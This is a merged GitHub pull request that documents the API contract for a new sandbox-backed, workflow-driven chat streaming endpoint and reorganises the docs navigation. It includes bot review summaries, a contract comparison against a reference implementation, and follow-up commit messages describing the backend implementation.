docs: add /api/chat/workflow contract + promote Chats to top-level nav #221

Merged
sweetmantech merged 5 commits into main from feat/api-chat-workflow-contract on May 21, 2026

Conversation

sweetmantech (Collaborator) commented May 21, 2026

Summary

Documentation-driven scoping for the upcoming Vercel-Workflow-backed chat endpoint that will live at POST /api/chat/workflow in api. Landing the contract first so the chat team can integrate against a real spec while the implementation is being ported from open-agents.

  • New OpenAPI path /api/chat/workflow with ChatWorkflowRequest schema (messages, chatId, sessionId, recoupAccessToken?) under Bearer apiKeyAuth
  • Response: text/event-stream + x-workflow-run-id response header
  • Documented status codes: 200 / 400 (incl. "Sandbox not initialized") / 401 / 404 / 409 (duplicate workflow for chat)
  • Frontmatter-only MDX page at api-reference/chat/workflow.mdx per docs CLAUDE.md convention — all prose lives in the OpenAPI description
  • Nav entry under Research → Chat, listed first

The endpoint description verbally maps the deferred sibling routes (GET /api/chat/{chatId}/stream, POST /api/chat/{chatId}/stop) so reviewers see the full planned surface without creating orphan "Coming soon" pages.

This endpoint is parallel to the existing POST /api/chat — does not replace it. The legacy endpoint continues to serve MCP- and Composio-tool chat for clients that need it.
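
A minimal client-side sketch of the request described above, assuming the required body fields (messages, chatId, sessionId) and Bearer auth. The helper name `buildChatWorkflowInit`, the simplified `UIMessageLike` type, and the placeholder host in the usage comment are illustrative assumptions, not part of this PR.

```typescript
// Simplified stand-in for the UIMessage type referenced by the schema (assumption).
interface UIMessageLike {
  id: string;
  role: "user" | "assistant" | "system";
  parts: { type: "text"; text: string }[];
}

// Required fields of ChatWorkflowRequest as listed in the summary.
interface ChatWorkflowBody {
  messages: UIMessageLike[];
  chatId: string;
  sessionId: string;
}

interface RequestInitLike {
  method: "POST";
  headers: Record<string, string>;
  body: string;
}

// Hypothetical helper: builds the fetch init for POST /api/chat/workflow.
function buildChatWorkflowInit(apiKey: string, body: ChatWorkflowBody): RequestInitLike {
  return {
    method: "POST",
    headers: {
      Authorization: `Bearer ${apiKey}`,
      "Content-Type": "application/json",
      Accept: "text/event-stream",
    },
    body: JSON.stringify(body),
  };
}

// Usage (not executed here; the host is a placeholder):
// const res = await fetch("https://<api-host>/api/chat/workflow", init);
// const runId = res.headers.get("x-workflow-run-id"); // keep for resume/stop
```

The run id is read from the response header rather than the stream body, so a client can store it before consuming any events.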

Background

Migration plan worked through in Slack (#recoup) between Sweetman and Arpit on 2026-05-20. Decision: port the open-agents /api/chat agent loop into api as /api/chat/workflow, swap the MCP toolset for the sandbox-only tool set (bash, read, write, grep, glob, todo, task, ask_user_question, skill, fetch), and rely on the recoupable/skills:recoup-api skill (already installed in every sandbox) as the HTTP bridge back to the API.

This is PR 1 of 5. Subsequent PRs land against api:

  1. Route stub: POST /api/chat/workflow with body validation + hardcoded UIMessage stream
  2. Port 10 sandbox tool files + buildAgentTools factory (no wiring)
  3. Port route-level helpers (createChatRuntime, agentCustomInstructions, extractOrgId, compareAndSetChatActiveStreamId, touchChat, reconcileExistingActiveStream, persistLatestUserMessage)
  4. Wire it all together — runAgentWorkflow + runAgentStep + replace stub with real start()

Test plan

  • Mintlify preview renders the new page under Research → Chat → Stream Chat (Workflow + Sandbox)
  • OpenAPI playground for /api/chat/workflow loads with request body, auth, and all five status codes
  • Legacy POST /api/chat page (api-reference/chat/stream) still renders unchanged
  • No broken cross-links — page references /api-reference/sandbox/create, /api-reference/sessions/create, /api-reference/sessions/create-chat, /api-reference/chat/stream

🤖 Generated with Claude Code


Summary by cubic

Adds the contract and docs for POST /api/chat/workflow, a Vercel Workflow–backed, sandbox-only chat streaming endpoint. Also promotes Chats to a top-level tab and trims the endpoint/schema descriptions to house style.

  • New Features

    • OpenAPI path POST /api/chat/workflow secured by apiKeyAuth.
    • ChatWorkflowRequest schema: messages, chatId, sessionId; optional context.contextLimit; no recoupAccessToken (Authorization header is forwarded into the sandbox).
    • Response: text/event-stream with x-workflow-run-id header; status codes: 200, 400 (sandbox not initialized), 401, 403, 404, 409.
    • Docs page api-reference/chat/workflow.mdx; endpoint and schema descriptions tightened. Notes future GET /api/chat/{chatId}/stream and POST /api/chat/{chatId}/stop.
  • Docs Navigation

    • New top-level tab: Chats.
    • Streaming group lists api-reference/chat/workflow, api-reference/chat/stream, api-reference/chat/generate.
    • Other chat pages reorganized under Chats and Messages groups.

Written for commit 6d33bfa. Summary will update on new commits.

Summary by CodeRabbit

  • New Features
    • New streaming chat workflow API endpoint (POST /api/chat/workflow) with session management capabilities
    • Built-in support for workflow execution control via x-workflow-run-id response headers
    • Complete API reference documentation added with request schema specifications and error handling details

Documentation-driven scoping for the upcoming Vercel-Workflow-backed
chat endpoint. Adds:

- New OpenAPI path /api/chat/workflow with ChatWorkflowRequest schema
  (messages, chatId, sessionId, recoupAccessToken) — Bearer apiKeyAuth
- Response: text/event-stream + x-workflow-run-id header
- Documented status codes: 200 / 400 / 401 / 404 / 409
- Frontmatter-only MDX page (per docs CLAUDE.md convention)
- Nav entry under Research > Chat, listed first

The endpoint description notes the deferred sibling routes
(GET /api/chat/{chatId}/stream, POST /api/chat/{chatId}/stop) so
the full surface is mapped without creating orphan pages.

Parallel to existing POST /api/chat — does not replace it.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

coderabbitai Bot commented May 21, 2026

Walkthrough

This PR documents a new workflow-backed chat streaming API endpoint. It adds an OpenAPI specification for POST /api/chat/workflow that accepts workflow chat requests and streams UI message parts via server-sent events, includes a new request schema defining required inputs, and creates corresponding documentation with navigation integration.

Changes

Workflow Chat API Documentation

| Layer / File(s) | Summary |
| --- | --- |
| Workflow chat request schema (api-reference/openapi/research.json) | ChatWorkflowRequest schema defines required workflow inputs (messages, chatId, sessionId) and optional recoupAccessToken for Recoup API access. |
| Workflow chat endpoint (api-reference/openapi/research.json) | POST /api/chat/workflow endpoint streams UI message parts via text/event-stream, includes x-workflow-run-id response header for resume/stop operations, and documents error responses (400/401/404/409) using ChatStreamErrorResponse. |
| API documentation page and navigation (api-reference/chat/workflow.mdx, docs.json) | New MDX page with frontmatter linking to the endpoint specification and navigation entry added to the Research > Chat section. |

Sequence Diagram

sequenceDiagram
  participant Client
  participant WorkflowEndpoint as POST /api/chat/workflow
  participant EventStream as text/event-stream
  Client->>WorkflowEndpoint: POST with ChatWorkflowRequest
  WorkflowEndpoint->>WorkflowEndpoint: Validate messages, chatId, sessionId
  WorkflowEndpoint->>EventStream: Stream UI message parts
  EventStream-->>Client: Return x-workflow-run-id header
  EventStream-->>Client: Stream event data
  Client->>WorkflowEndpoint: Resume/stop via x-workflow-run-id

Estimated code review effort

🎯 2 (Simple) | ⏱️ ~10 minutes

Poem

🐰 A workflow takes shape, streaming with care,
Request and response dancing in air,
Messages flowing through the event stream's thread,
Documentation guides where the endpoint is led,
New paths in the schema, navigation so bright!

🚥 Pre-merge checks | ✅ 5
✅ Passed checks (5 passed)
| Check name | Status | Explanation |
| --- | --- | --- |
| Docstring Coverage | ✅ Passed | No functions found in the changed files to evaluate docstring coverage. Skipping docstring coverage check. |
| Linked Issues check | ✅ Passed | Check skipped because no linked issues were found for this pull request. |
| Out of Scope Changes check | ✅ Passed | Check skipped because no linked issues were found for this pull request. |
| Title check | ✅ Passed | The title accurately describes the two main changes: adding OpenAPI documentation for /api/chat/workflow and promoting Chats to top-level navigation. |
| Description Check | ✅ Passed | Check skipped - CodeRabbit’s high-level summary is enabled. |


@coderabbitai coderabbitai Bot left a comment


Actionable comments posted: 1

🤖 Prompt for all review comments with AI agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.

Inline comments:
In `@api-reference/chat/workflow.mdx`:
- Around line 1-4: The frontmatter in this MDX page is missing a description
field; update the frontmatter block (the YAML between the leading --- markers
that currently contains title and openapi) to add a descriptive "description"
key that succinctly summarizes the page (e.g., purpose of the Stream Chat
Workflow + Sandbox API), ensuring the new description follows the existing style
and uses clear, self-documenting wording.

ℹ️ Review info
⚙️ Run configuration

Configuration used: defaults

Review profile: CHILL

Plan: Pro

Run ID: c31d3aea-0679-48b3-afda-96da86c493ad

📥 Commits

Reviewing files that changed from the base of the PR and between c55693f and 1270883.

📒 Files selected for processing (3)
  • api-reference/chat/workflow.mdx
  • api-reference/openapi/research.json
  • docs.json

Comment on lines +1 to +4
---
title: 'Stream Chat (Workflow + Sandbox)'
openapi: 'POST /api/chat/workflow'
---


⚠️ Potential issue | 🟡 Minor | ⚡ Quick win

Add a description field to frontmatter.

This API reference page is correctly frontmatter-only, but it is missing description metadata.

Proposed fix
 ---
 title: 'Stream Chat (Workflow + Sandbox)'
+description: 'Stream sandbox-driven chat via Vercel Workflow.'
 openapi: 'POST /api/chat/workflow'
 ---

As per coding guidelines: **/*.mdx: "Use MDX (Markdown + JSX) for documentation pages with frontmatter for page metadata (title, description)" and "Use clear, self-documenting titles and descriptions in documentation".


@cubic-dev-ai cubic-dev-ai Bot left a comment


No issues found across 3 files


Chats was buried as the first group under Research, where it shared
nav space with Artist discovery / Metrics / Catalog / etc. — none of
which are conceptually adjacent. Promote it to a top-level tab and
break the 12-page flat list into three sub-groups so the surface is
scannable:

- Streaming: workflow, stream, generate (the agent-run endpoints)
- Chats: create, chats (list), artist, update, delete, compact (room CRUD)
- Messages: messages, messages-copy, messages-trailing-delete

Tab order: Quickstart → Artists → Chats → Research → ... — Chats sits
next to Artists since they're the two primary product surfaces.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
@sweetmantech sweetmantech changed the title docs(api-reference): add POST /api/chat/workflow contract docs: add /api/chat/workflow contract + promote Chats to top-level nav May 21, 2026
The Bearer API key in the Authorization header is the authoritative
caller identity — passing it again in the body is redundant. The
implementation will forward the header into the sandbox so the
recoupable/skills:recoup-api skill can authenticate calls back.

Updated the schema description to make the header-forwarding pattern
explicit, removed the body field, and trimmed the example.
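
A minimal sketch of the header-forwarding idea, assuming the token is passed to the sandbox as an environment variable. The names `extractBearerToken`, `buildSandboxEnv`, and `RECOUP_API_KEY` are hypothetical; the commit only states that the Authorization header is forwarded, not how.

```typescript
// Extract the token from an "Authorization: Bearer <token>" header value.
// Returns null when the header is missing or uses another scheme.
function extractBearerToken(authorization: string | null): string | null {
  if (!authorization) return null;
  const match = /^Bearer\s+(\S+)$/i.exec(authorization.trim());
  return match?.[1] ?? null;
}

// Hypothetical: build the environment handed to the sandbox so a skill
// running inside it can authenticate calls back to the API.
// RECOUP_API_KEY is an assumed variable name, not taken from the PR.
function buildSandboxEnv(authorization: string | null): Record<string, string> {
  const token = extractBearerToken(authorization);
  return token ? { RECOUP_API_KEY: token } : {};
}
```

Because the caller identity comes from a single place (the header), there is no second copy in the body that could disagree with it.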

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
@sweetmantech

Collaborator Author

Contract diff vs. open-agents reference

Comparing what this PR documents against what open-agents/apps/web/app/api/chat/route.ts + _lib/request.ts + _lib/chat-context.ts actually accept and return today.

Request body

| Field | Open-agents accepts | PR #221 documents | Status |
| --- | --- | --- | --- |
| messages | required, array (custom-cast to WebAgentUIMessage[]) | required, UIMessage[] ref | ✅ match |
| chatId | optional at schema, enforced via requireChatIdentifiers (400) | required at schema | ✅ same net behavior |
| sessionId | optional at schema, enforced via requireChatIdentifiers (400) | required at schema | ✅ same net behavior |
| recoupAccessToken | optional, z.string().min(1).max(8192) | not in body; Authorization header forwarded into sandbox instead | ⚠️ intentional divergence (api uses Bearer key as caller identity) |
| context.contextLimit | optional, number | not documented | ❌ gap: add to schema |

Response — success

| Aspect | Open-agents returns | PR #221 documents | Status |
| --- | --- | --- | --- |
| Status | 200 | 200 | |
| Content-Type | text/event-stream (via createUIMessageStreamResponse) | same | |
| Body | UIMessage chunks | same | |
| x-workflow-run-id header | yes | yes | |

Response — errors

| HTTP status | Open-agents emits | PR #221 documents | Status |
| --- | --- | --- | --- |
| 400 (bad JSON / bad body / missing identifiers / sandbox inactive) | { "error": "...", "issues"?: ZodIssue[] } | ChatStreamErrorResponse = { "status": "error", "message": "..." } | ❌ shape mismatch |
| 401 | { "error": "Not authenticated" } (cookie-based) | ChatStreamErrorResponse (Bearer-based) | ❌ shape mismatch + ⚠️ auth differs by design |
| 403 (ownership mismatch / trial limit) | { "error": "Forbidden" } / { "error": MANAGED_TEMPLATE_TRIAL_MESSAGE_LIMIT_ERROR } | not documented | ❌ gap: add 403 (api will need it for Bearer-key-owns-session check) |
| 404 (session not found / chat not found) | { "error": "Session not found" } / { "error": "Chat not found" } | ChatStreamErrorResponse | ❌ shape mismatch |
| 409 (workflow conflict) | { "error": "Another workflow is already running for this chat" } | ChatStreamErrorResponse | ❌ shape mismatch |

Auth model

Intentional divergence, already locked in our plan: open-agents uses a session cookie (requireAuthenticatedUser → getServerSession), while this PR documents Bearer apiKeyAuth, since that is the api codebase convention and unlocks bring-your-own-agent usage.

Action items before merge

  1. Add optional context.contextLimit: number to ChatWorkflowRequest — small omission, no design decision needed
  2. Add 403 to the response list — needed for Bearer-key-doesn't-own-session-or-chat (analogous to open-agents' ownership check)
  3. Decision: error response shape — open-agents returns { "error": "..." }. The legacy ChatStreamErrorResponse I reused returns { "status": "error", "message": "..." }. Pick one:
    • Option A: define a new ChatWorkflowErrorResponse matching open-agents ({ error: string, issues?: array }) — clients that integrate against open-agents today work unchanged against api
    • Option B: keep ChatStreamErrorResponse for consistency with the legacy api endpoints — clients must adapt error parsing when porting
    • Recommendation: Option A — the whole point of the contract match is drop-in portability; error parsing is part of that contract
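
To make the trade-off concrete, here is a hedged sketch of a client-side parser that tolerates both error shapes discussed above. The type and function names are illustrative; only the two JSON shapes come from the comparison table.

```typescript
// Shape emitted by open-agents, per the table above.
type OpenAgentsError = { error: string; issues?: unknown[] };
// Shape of the legacy ChatStreamErrorResponse, per the table above.
type ChatStreamErrorResponse = { status: "error"; message: string };

function isRecord(value: unknown): value is Record<string, unknown> {
  return typeof value === "object" && value !== null;
}

function isOpenAgentsError(body: unknown): body is OpenAgentsError {
  return isRecord(body) && typeof body["error"] === "string";
}

function isChatStreamError(body: unknown): body is ChatStreamErrorResponse {
  return isRecord(body) && body["status"] === "error" && typeof body["message"] === "string";
}

// Hypothetical helper: returns the human-readable message from either shape,
// or null when the body matches neither.
function errorMessageFrom(body: unknown): string | null {
  if (isOpenAgentsError(body)) return body.error;
  if (isChatStreamError(body)) return body.message;
  return null;
}
```

Under Option A a client needs only the first branch; under Option B a client ported from open-agents needs the second one added.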

Want me to push the fixes (add context, add 403, switch to a new error schema matching open-agents) before this merges?

Close two contract gaps surfaced by the open-agents diff (PR comment):

- Add optional `context.contextLimit: number` to ChatWorkflowRequest
  so clients that already send `context` against open-agents' /api/chat
  port over unchanged.

- Document 403 in the response list — separate from 404 so callers can
  distinguish "session/chat doesn't exist" from "session/chat exists
  but the API key's account doesn't own it" (the ownership check the
  Bearer auth model requires).

Error response shape (`{status, message}` via ChatStreamErrorResponse)
intentionally kept — matches existing api convention rather than
open-agents' `{error, issues?}` shape.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
@sweetmantech

Collaborator Author

Both gaps fixed in ef8b51e:

  • ✅ Added optional context.contextLimit: number to ChatWorkflowRequest — matches open-agents body
  • ✅ Added 403 to response list — distinguishes "not found" from "exists but not owned by the API key's account"
  • ✅ Error response shape kept as ChatStreamErrorResponse ({status, message}) — matches existing api convention, intentional divergence from open-agents' {error, issues?} shape

Updated contract diff:

| Aspect | Open-agents | PR #221 (after fix) | Status |
| --- | --- | --- | --- |
| messages / chatId / sessionId | as documented | same | ✅ match |
| context.contextLimit | optional | optional | ✅ match |
| recoupAccessToken | optional in body | Bearer header forwarded | ⚠️ intentional |
| Auth | session cookie | Bearer apiKeyAuth | ⚠️ intentional |
| Success response (stream + x-workflow-run-id) | as documented | same | ✅ match |
| Status codes 200/400/401/403/404/409 | all emitted | all documented | ✅ match |
| Error body shape | {error, issues?} | {status, message} (ChatStreamErrorResponse) | ⚠️ intentional, matches api convention |

Endpoint description went from ~1500 chars (4 paragraphs) to ~450
chars (1 paragraph). Schema description from ~650 to ~310.

House style for these docs is 150-300 chars per endpoint description;
the verbose version was an outlier. Detail that lived in the long
description is already covered structurally:

- 409 conflict semantics → already on the 409 response description
- x-workflow-run-id header → already on the success response header
- Sandbox-not-initialized → already on the 400 response description
- Stream-resume on duplicate run → out of scope for endpoint-glance;
  belongs in the (deferred) /api/chat/{chatId}/stream docs

Keeps the must-haves: what it does, the tool list (the differentiator
vs /api/chat), the sandbox prereq, and the legacy-endpoint pointer.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
@sweetmantech sweetmantech merged commit 5b4ec46 into main May 21, 2026
3 checks passed
@sweetmantech sweetmantech deleted the feat/api-chat-workflow-contract branch May 21, 2026 13:04
sweetmantech added a commit to recoupable/api that referenced this pull request May 21, 2026
…579)

* feat(chat-workflow): add POST /api/chat/workflow route stub

Adds the route stub for the new sandbox-driven, Vercel-Workflow-backed
chat endpoint documented in recoupable/docs#221. The stub validates
the full request contract (auth, body, session/chat ownership,
sandbox active) and returns a hardcoded UIMessage stream with an
x-workflow-run-id: stub-<uuid> header — so the chat-side team can
integrate against the real response shape today while the workflow
itself is being ported from open-agents in follow-up PRs.

Files:
- app/api/chat/workflow/route.ts — thin POST shim + OPTIONS for CORS
- lib/chat/handleChatWorkflowStream.ts — auth → validate → session/chat
  ownership → sandbox check → stub UIMessage stream
- lib/chat/validateChatWorkflowBody.ts — Zod schema matching the OpenAPI
  ChatWorkflowRequest (messages, chatId, sessionId, optional
  context.contextLimit)

Status codes implemented (match contract docs):
- 200 — UIMessage stream + x-workflow-run-id header
- 400 — invalid JSON / invalid body / "Sandbox not initialized"
- 401 — validateAuthContext passthrough
- 403 — session not owned by API key's account
- 404 — session or chat not found (incl. chat under different session)
- 500 — selectSessions returned null (DB error)

409 (duplicate workflow run for chat) is deferred to the wire-up PR
that adds compareAndSetChatActiveStreamId — no workflow to dedupe yet.
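
The ownership and sandbox checks listed above can be sketched as a pure decision function. This is an illustration under assumptions: the row shapes, field names, and the exact order of the 404 and 403 checks are hypothetical, and the 401 (auth) and 500 (DB error) paths are left out.

```typescript
// Hypothetical row shapes; the real tables may use different column names.
interface SessionRow {
  id: string;
  accountId: string;
  sandboxActive: boolean;
}

interface ChatRow {
  id: string;
  sessionId: string;
}

// Decide the status code once auth and body validation have already passed.
function resolveStatus(input: {
  accountId: string;
  session: SessionRow | null;
  chat: ChatRow | null;
}): 200 | 400 | 403 | 404 {
  const { accountId, session, chat } = input;
  if (!session) return 404; // session not found
  if (session.accountId !== accountId) return 403; // exists, but not owned by this API key's account
  if (!chat || chat.sessionId !== session.id) return 404; // chat missing or under a different session
  if (!session.sandboxActive) return 400; // "Sandbox not initialized"
  return 200;
}
```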

Tests (TDD red→green): 23 new tests, all green; full suite 2901 pass.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — SRP/DRY cleanup

Two review fixes per PR feedback:

1. SRP/DRY — drop the local errorResponse helper from
   handleChatWorkflowStream.ts; use the shared
   lib/networking/errorResponse and lib/zod/validationErrorResponse
   helpers instead.

2. SRP — move auth + body parsing out of handleChatWorkflowStream.ts
   into the validator. Rename validateChatWorkflowBody → validateChatWorkflow
   so it accepts a full NextRequest (like the existing validateChatRequest)
   and returns an auth-augmented body (accountId/orgId/authToken). The
   handler now opens with a single `validateChatWorkflow(request)` call.

Tests reshaped to match new seams:
- Validator test mocks validateAuthContext only
- Handler test mocks validateChatWorkflow (the new seam)
- Old "400 invalid JSON" + "400 missing chatId" handler tests collapsed
  into a single "validator short-circuit passes through" test — both are
  now the validator's responsibility, not the handler's

22/22 new tests green; full suite 2900/2900 pass; lint clean.
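
A rough sketch of the "validator short-circuit" seam described above, using a hand-rolled check in place of the Zod schema so the example stays dependency-free. The result type, function names, and error messages are assumptions; auth is omitted.

```typescript
interface ChatWorkflowInput {
  messages: unknown[];
  chatId: string;
  sessionId: string;
  context?: { contextLimit?: number };
}

// Either a validated body or an error the handler can return as-is.
type ValidationResult =
  | { ok: true; body: ChatWorkflowInput }
  | { ok: false; status: 400; message: string };

function fail(message: string): ValidationResult {
  return { ok: false, status: 400, message };
}

// Hand-rolled stand-in for the Zod schema (not the actual implementation).
function validateBody(raw: unknown): ValidationResult {
  if (typeof raw !== "object" || raw === null) return fail("body must be a JSON object");
  const { messages, chatId, sessionId, context } = raw as Record<string, unknown>;
  if (!Array.isArray(messages)) return fail("messages must be an array");
  if (typeof chatId !== "string" || chatId.length === 0) return fail("chatId is required");
  if (typeof sessionId !== "string" || sessionId.length === 0) return fail("sessionId is required");

  const body: ChatWorkflowInput = { messages, chatId, sessionId };
  if (context !== undefined) {
    if (typeof context !== "object" || context === null) return fail("context must be an object");
    const limit = (context as Record<string, unknown>)["contextLimit"];
    if (limit !== undefined && typeof limit !== "number") {
      return fail("context.contextLimit must be a number");
    }
    body.context = typeof limit === "number" ? { contextLimit: limit } : {};
  }
  return { ok: true, body };
}

// The handler opens with one call and passes validator failures through.
function handle(raw: unknown): { status: number; message?: string } {
  const result = validateBody(raw);
  if (!result.ok) return { status: result.status, message: result.message };
  return { status: 200 };
}
```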

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* chore: revert unrelated local changes accidentally swept into PR

Previous commit (9262f65) used `git add -A` which picked up local
Supabase CLI artifacts (supabase/.temp/) and a local .gitignore tweak
that aren't part of this PR's scope. Removing them now so the PR
diff stays scoped to the chat-workflow refactor.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
sweetmantech added a commit to recoupable/api that referenced this pull request May 21, 2026
…579) (#580)

sweetmantech added a commit to recoupable/api that referenced this pull request May 21, 2026
* feat(chat-workflow): POST /api/chat/workflow route stub (PR 2 of 5) (#579)


* feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow (PR 3 of 4) (#581)

* feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow

Replaces the stub UIMessage stream in PR #579 with a real Vercel Workflow
agent loop. Stub run-ids (`stub-<uuid>`) are replaced with real ones
(`wrun_<id>`) emitted by the workflow runtime. Tools are still NOT wired —
the workflow runs streamText with the gateway model + Recoup custom
instructions only. Sandbox tool surface comes in a follow-up PR.

What's now plumbed end-to-end:
- validateChatWorkflow → session+chat ownership → sandbox active → reconcile
  existing active_stream_id (resume / 409 / fall-through) → refresh
  lifecycle activity → fire-and-forget persist user message → start
  runAgentWorkflow → CAS active_stream_id (cancel + 409 on race) →
  return run.getReadable() with x-workflow-run-id header

New helpers (Supabase):
- compareAndSetChatActiveStreamId — atomic CAS on chats.active_stream_id
- touchChat — bump chats.updated_at
- updateChat — generic partial update mirroring updateSession's shape
- createChatMessageIfNotExists — INSERT ... ON CONFLICT DO NOTHING via upsert
- isFirstChatMessage — true iff exactly one row exists matching messageId

New helpers (chat/recoupable):
- extractOrgId — `org-<slug>-<uuid>` → uuid (lowercased)
- agentCustomInstructions — assistantFileLinkPrompt + recoupApiSkillPrompt
- persistLatestUserMessage — fire-and-forget user msg + title-from-first-80
- reconcileExistingActiveStream — 3-attempt resume/clear/conflict loop
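
As an illustration of the `org-<slug>-<uuid>` to uuid mapping named above, a minimal sketch follows. The regex, the null return for non-matching input, and the sample identifier are assumptions; the commit only states the input pattern and that the result is lowercased.

```typescript
// Matches "org-<slug>-<uuid>" where the UUID is the final 36 characters.
// The slug may itself contain hyphens, so the UUID is anchored to the end.
const ORG_ID_PATTERN =
  /^org-.+-([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})$/i;

// Sketch of extractOrgId: returns the lowercased UUID, or null when the
// input does not follow the expected pattern (the null case is an assumption).
function extractOrgId(identifier: string): string | null {
  const match = ORG_ID_PATTERN.exec(identifier);
  const uuid = match?.[1];
  return uuid ? uuid.toLowerCase() : null;
}
```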

New workflow files:
- app/workflows/runAgentWorkflow.ts — `"use workflow"`, agent loop wrapper
- app/workflows/runAgentStep.ts — `"use step"`, single streamText turn

Tests: 46 new (8 extractOrgId + 5 compareAndSetChatActiveStreamId + 3 touchChat + 2 updateChat + 3
createChatMessageIfNotExists + 5 isFirstChatMessage + 7 persistLatest +
6 reconcileExistingActiveStream + 18 handler-wire-up tests refactored).
Full suite: 2946/2946 pass, lint clean.

Out of scope (next PR): sandbox tool ports (10 files + buildAgentTools).
Without tools, `finishReason` is always "stop" after one turn — the
runAgentWorkflow loop shape is in place but only iterates once today.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — structural + P1/P2 fixes

Sweetman structural feedback (KISS / OCP):
- Move workflow files: app/workflows/runAgent{Workflow,Step}.ts →
  app/lib/workflows/runAgent{Workflow,Step}.ts
- Generic Supabase helpers + domain wrappers:
  - Generic `updateChat({filter, updates})` with optional CAS predicate
    on active_stream_id. Subsumes compareAndSetChatActiveStreamId and
    touchChat (both deleted).
  - Generic `selectChatMessages({chatId, orderBy, limit, ...})` replaces
    domain-specific isFirstChatMessage. The "is earliest?" check now
    lives in persistLatestUserMessage where it belongs.
  - Rename createChatMessageIfNotExists → `upsertChatMessage` with a
    discriminated `{ok, row, isDuplicate} | {ok:false, error}` result so
    callers can tell duplicates from DB errors.
- Extract resume-stream block from handler into `maybeResumeChatStream.ts`
  (OCP — handler stays small, resume logic grows independently).

cubic P1 fixes:
- CAS-before-start: handler now claims `active_stream_id` with a
  `pending-<uuid>` placeholder BEFORE calling start(workflow). Closes the
  race where two requests could both bill the model before one lost the
  CAS. After start(), promotes the placeholder to the real run id.
- updateChat returns discriminated `{ok, rowsUpdated} | {ok:false, error}`
  so callers distinguish "race lost" (rowsUpdated:0) from DB errors.
- reconcileExistingActiveStream: bare try/catch on getRun no longer
  clears stale active_stream_id on transient workflow API failures —
  we treat any uncertainty as conflict. Failed CAS-clear on a completed
  run also returns conflict (rather than possibly falling through to
  ready on a DB read error).
- await getRun(runId).cancel() in handler — previously synchronous +
  unawaited cancellation could escape the try/catch.
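
The CAS-before-start ordering described above can be illustrated with an in-memory stand-in for `chats.active_stream_id`. Everything here is hypothetical (the `Map` store, `claimThenStart`, the synchronous `startWorkflow` callback, and the release-on-failure step); the real handler talks to Supabase and awaits the workflow runtime.

```typescript
// In-memory stand-in for chats.active_stream_id (assumption for illustration).
type ActiveStreamStore = Map<string, string | null>;

// Compare-and-set: write `next` only if the current value equals `expected`.
function compareAndSet(
  store: ActiveStreamStore,
  chatId: string,
  expected: string | null,
  next: string | null,
): boolean {
  const current = store.get(chatId) ?? null;
  if (current !== expected) return false;
  store.set(chatId, next);
  return true;
}

type ClaimResult = { status: "started"; runId: string } | { status: "conflict" };

function claimThenStart(
  store: ActiveStreamStore,
  chatId: string,
  placeholderSuffix: string,
  startWorkflow: () => string, // synchronous here for brevity
): ClaimResult {
  const placeholder = `pending-${placeholderSuffix}`;
  // 1. Claim the slot before any billable work happens.
  if (!compareAndSet(store, chatId, null, placeholder)) {
    return { status: "conflict" };
  }
  try {
    // 2. Only the request that won the claim starts a workflow.
    const runId = startWorkflow();
    // 3. Promote the placeholder to the real run id.
    compareAndSet(store, chatId, placeholder, runId);
    return { status: "started", runId };
  } catch (error) {
    // Assumed cleanup: release the claim if the start itself fails.
    compareAndSet(store, chatId, placeholder, null);
    throw error;
  }
}
```

Because the losing request returns before `startWorkflow` runs, it never reaches the model.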

cubic P2 fixes:
- updateChat updates parameter narrowed to `ChatMutableFields` (excludes
  id, session_id, created_at).
- persistLatestUserMessage: title truncation now respects TITLE_MAX_LENGTH
  exactly. Uses "…" (1 char) instead of "..." (3 chars) and slices to
  body-budget = max - suffix.
- runAgentStep: acquire writer once, release in finally. Per-chunk writer
  acquisition could leak the lock on write failure.
- runAgentWorkflow: capped at a single turn until messages threading
  lands with tool ports (PR 4). Multi-turn loop with the same input was
  unsafe — log+warn if model returns tool-calls and exit.
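
The title-truncation fix above (single-character ellipsis, body budget = max - suffix) can be sketched as follows. The function name and the default of 80 are assumptions; the commit only names TITLE_MAX_LENGTH without giving its value here.

```typescript
// Hypothetical sketch of the truncation rule, not the shipped helper.
const ELLIPSIS = "…"; // one UTF-16 code unit, unlike "..." which is three

function truncateTitleSketch(text: string, maxLength = 80): string {
  if (text.length <= maxLength) return text;
  // Reserve room for the suffix so the result never exceeds maxLength.
  const bodyBudget = Math.max(0, maxLength - ELLIPSIS.length);
  return text.slice(0, bodyBudget) + ELLIPSIS;
}
```

With a three-character suffix and an 80-character slice, the old result could reach 83 characters; budgeting the suffix first keeps it at the cap.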

Tests reworked: 231 in the touched files all green; full suite 2949/2949;
lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): top-level import in reconcileExistingActiveStream

The dynamic `await import("workflow/api")` inside the function body was
a carry-over from open-agents — handleChatWorkflowStream.ts already
top-level imports `start` and `getRun` from the same package, so there's
no reason for the lib to defer. Moving to a normal top-level import for
consistency.

Also tightens the cancel-throws handler test to use the same deferred-
rejection pattern as reconcileExistingActiveStream.test.ts so Vitest's
unhandled-rejection watcher doesn't trip on the mock setup.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): move active_stream_id CAS out of supabase lib

Per sweetman's review on updateChat.ts:64 — the active_stream_id-specific
predicate logic doesn't belong in the Supabase plumbing. Restructured:

- `lib/supabase/chats/updateChat.ts` now generic. The filter accepts
  `where: Partial<Tables<"chats">>` (a generic predicate that maps to
  `column = value` or `column IS NULL`) so no column name is hardcoded
  in the Supabase lib.

